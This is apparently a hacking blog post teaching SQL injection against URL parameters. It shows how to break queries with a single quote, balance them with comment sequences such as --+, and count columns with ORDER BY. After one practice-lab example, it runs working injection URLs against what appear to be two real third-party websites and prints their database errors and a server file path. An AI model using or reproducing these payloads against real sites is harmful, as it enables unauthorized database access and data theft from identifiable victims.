First we Discuss On Nature of SQLI error .. Today First i will dicuss Some Common Errors of sql injection and also we will learn how to Fix and solve that Errors..
1-::
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'
Error While Selection process : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
Now Trying to fix by Adding Comments at the end .
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' --+In My case it is fixed.AS you can See In picture.
If it is not fixing by adding --+ or -- -
Then Use "=" , %60 , ; at the end at .. If it is also not worked then Remove Single Code then Proceed Order by or Group by.................................
In such Type of Error it tells You how much columns it have ..How it tells itself...Suppose it has 3 columns if i ask database that you have 4 columns like that
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 1--+No Errorhttp://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 2--+No Error http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 3--+No Error ::
Now At order by 4 :::---
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 4--+
it Generate Error and then Tell us that Error While Selection process : Unknown column '4' in 'order clause'
So if i Do :::----
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 3--+
But At this time no Error Comes page normally load it means it has 3 columns..
----------------------------------------------------------------------------------------------------------------------
----------------------------------------------------
Lets start ::
http://mohitminerals.in/news.php?id=39'
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/mohitmin/public_html/news.php on line 87
This type of Error is Very Eeasy to solve and My Favourite Error.
http://mohitminerals.in/news.php?id=39' --+
In My Case It is Fix and Balanced by Adding --+ ..In Most Cases Such Type of Error fixed by Removing Single Code ..
like That::
http://mohitminerals.in/news.php?id=39 --This type of Error Does not tell us Unknown Column is Blah Balh in Order 'caluse'
~~::So How to find Number Of Columns ::~~
Lets Start :D
- http://mohitminerals.in/news.php?id=39' order by 1--+
- No Error Comes .Loaded Normally
- http://mohitminerals.in/news.php?id=39' order by 2--+
- No Error Comes. Loaded Normally
- http://mohitminerals.in/news.php?id=39' order by 3--+
- No Error Comes. Loaded Normally
- http://mohitminerals.in/news.php?id=39' order by 4--+
- No Error Comes. Loaded Normally
- http://mohitminerals.in/news.php?id=39' order by 5--+
- No Error Comes. Loaded Normally
- http://mohitminerals.in/news.php?id=39' order by 6--+
- No Error Comes. Loaded Normally
- http://mohitminerals.in/news.php?id=39' order by 7--+
- No Error Comes. Loaded Normally
----------------------------------------------------------------------------------------------------------------
http://mohitminerals.in/news.php?id=39' order by 8--+
At order by 8 IT Generates This Error:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/mohitmin/public_html/news.php on line 87
----------------------------------------------------------------------------------------------------------------
So it Means It Has 7 columns :p
I Hope You Got The Point :D
-------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------
3rd Type of SQLI Error That is Content Missing
------------------------------------------------------------------------------------------------------------------------
Some Time When we put single Code Page load normally but some content is missing . So this is also SQli Error .
Lets Go.. Do some Testing ..
-------------------------------------------------------------
Before Putting Single Code:
http://ceew.in/newsDetails.php?id=177
-------------------------------------------------------------------------------------------------------------------------
Now See The Magic when i put Single Code ::
http://ceew.in/newsDetails.php?id=177'
-------------------------------------------------------------------
In My Case When Added --+ at the end Error Goes ..Means Page Load normally with all its Contents.. So it means it is Balanced.
http://ceew.in/newsDetails.php?id=177' --+
------------------------------------------------------------------------------------------------------------------------
After the Fixing Now Going TO Find Number Of Columns::
- http://ceew.in/newsDetails.php?id=177' order by 1--+
- Page loaded Normally With All contents.It means It has 1 column.
- http://ceew.in/newsDetails.php?id=177' order by 2--+
- Page loaded Normally With All contents.It means It has 2 column.
- http://ceew.in/newsDetails.php?id=177' order by 3--+
- Page loaded Normally With All contents.It means It has 3 column.
- http://ceew.in/newsDetails.php?id=177' order by 4--+
- Page loaded Normally With All contents.It means It has 4 column.
- http://ceew.in/newsDetails.php?id=177' order by 5--+
- Page loaded Normally With All contents.It means It has 5 column.
- http://ceew.in/newsDetails.php?id=177' order by 6--+
- Page loaded Normally With All contents.It means It has 6 column
- http://ceew.in/newsDetails.php?id=177' order by 7--+
- page loaded Normally With All contents.It means It has 7 column.
- http://ceew.in/newsDetails.php?id=177' order by 8--+
- Page loaded Normally With All contents.It means It has 8 column.
- http://ceew.in/newsDetails.php?id=177' order by 9--+
- Page loaded Normally With All contents.It means It has 9 column.
-----------------------------------------------------------------
Now When i Did order by 10. Page loaded Normally But with Content missing :::
So it means it has 9 Columns beacuse at 10 it gives us error :p
http://ceew.in/newsDetails.php?id=177' order by 10--+
-----------------------------------------------------------------------------------------------------------------------
I hope U Got it ..If you Have Any Question Feel Free To ask :
Author :: (Afghani)
Thanx To::Janus , Amir ,Zeeshan ,KhexAn, And Many More :D
No comments:
Post a Comment